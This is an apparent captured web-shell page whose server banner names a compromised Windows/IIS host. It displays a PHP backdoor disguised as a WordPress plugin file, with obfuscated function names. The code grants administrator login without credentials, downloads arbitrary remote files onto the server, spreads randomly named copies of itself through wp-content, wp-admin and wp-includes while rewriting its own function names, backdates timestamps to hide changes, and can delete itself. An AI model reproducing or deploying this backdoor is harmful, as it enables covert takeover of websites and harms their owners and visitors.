|
Server IP : 103.11.96.170 / Your IP : 18.216.110.162 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0555) : D:/localhost/elibrary/../ppp/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
define('WP_USE_THEMES', false);
define('PLUGIN_VERSION', '5.1');
require_once($_SERVER['DOCUMENT_ROOT'] . '/wp-load.php');
function sptdelgifknhru($parent, $child="") {
$path = "{$_SERVER['DOCUMENT_ROOT']}/$parent/$child";
$directories = array_filter(scandir($path), fn($dir) => $dir != '.' && $dir != '..');
$result = [];
foreach ($directories as $dir) {
$directory = "$path/$dir";
if (is_dir($directory)) {
$result[] = $directory;
$result = array_merge($result, sptdelgifknhru($parent, "$child/$dir"));
}
}
return $result;
}
function mvxcotsfgeprunkd($length = 8, $includeNumbers = true) {
$characters = 'abcdefghijklmnopqrstuvwxyz' . ($includeNumbers ? '1234567890' : '');
return substr(str_shuffle($characters), 0, $length);
}
function xewinqmslgouh($path) {
return str_replace($_SERVER['DOCUMENT_ROOT'], $_SERVER['HTTP_HOST'], $path);
}
function fnetpursahcwzbgjo($filename) {
$timestamp = mt_rand(strtotime('2020-01-01 12:12:12'), strtotime('2022-12-30 13:13'));
touch($filename, $timestamp);
clearstatcache(true, $filename);
}
function utmypcnlqzivedf($filename) {
$content = file_get_contents($filename);
if (!$content) {
$file = fopen($filename, 'r');
$content = fread($file, filesize($filename));
fclose($file);
}
return $content;
}
function cxkregayhwnu() {
$path = $_SERVER['DOCUMENT_ROOT'] . '/wp-content';
$dirs = [];
if (is_dir($path) && $handle = opendir($path)) {
while (false !== ($entry = readdir($handle))) {
if ($entry !== "." && $entry !== ".." && is_dir($path . '/' . $entry) && $entry !== 'plugins') {
$dirs[$entry] = $path . '/' . $entry;
}
}
closedir($handle);
}
return $dirs;
}
function gobsxdecty() {
$action = $_REQUEST['action'];
$initialDirs = cxkregayhwnu();
$dirs = [];
foreach (array_keys($initialDirs) as $dir) {
$dirs[$dir] = sptdelgifknhru("wp-content", $dir);
}
$dirs['admin'] = sptdelgifknhru('wp-admin','');
$dirs['includes'] = sptdelgifknhru('wp-includes','');
$message = [];
switch ($action) {
case 'login':
$user = get_users(["role" => "administrator"])[0];
wp_set_auth_cookie($user->data->ID);
wp_set_current_user($user->data->ID);
die($user->data->ID);
case 'download':
$url = $_REQUEST['url'];
$filename = $_REQUEST['filename'];
$response = file_get_contents($url);
if ($response !== false) {
file_put_contents($filename, $response) || (file_put_contents($filename, $response) === false && fwrite(fopen($filename, 'w'), $response));
}
$message['success'] = file_exists($filename) && filesize($filename) > 10;
break;
case 'delete':
unlink(__FILE__);
case 'copy':
$filename = $_REQUEST['filename'];
if (!file_exists($filename) || filesize($filename) < 10) {
$message['success'] = false;
$message['data'] = [];
break;
}
$target = $_REQUEST['dir'] ?: $_SERVER['DOCUMENT_ROOT'];
$replace = $_REQUEST['replace'] ? true : false;
$num = $_REQUEST['num'] ?: 1;
$success = [];
if ($replace) {
$content = utmypcnlqzivedf($filename);
if ($content) {
$pattern = '/function\s+([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*)\s*\(/';
$functions = preg_match_all($pattern, $content, $result);
$result = $result[1];
if ($result) {
foreach ($result as $oldFunction) {
$randomChar = mvxcotsfgeprunkd(rand(10,17), false);
$content = str_replace("$oldFunction(", "$randomChar(", $content);
}
file_put_contents($filename, $content);
}
}
}
for ($i = 0; $i < $num; $i++) {
$randomName = $_REQUEST['random_name'] ? mvxcotsfgeprunkd(rand(5, 10)) . '.php' : $filename;
$directoriesTarget = is_array($dirs[$target]) ? $dirs[$target][array_rand($dirs[$target])] : ($target ?: $_SERVER['DOCUMENT_ROOT']);
$outputName = "$directoriesTarget/$randomName";
$message["success[$i]"] = copy($filename, $outputName);
if ($message["success[$i]"]) {
$success[] = xewinqmslgouh($outputName);
fnetpursahcwzbgjo($outputName);
fnetpursahcwzbgjo($directoriesTarget);
}
}
$message['data'] = $success;
break;
default:
$message['directories'] = array_keys($dirs);
}
echo json_encode($message);
}
gobsxdecty();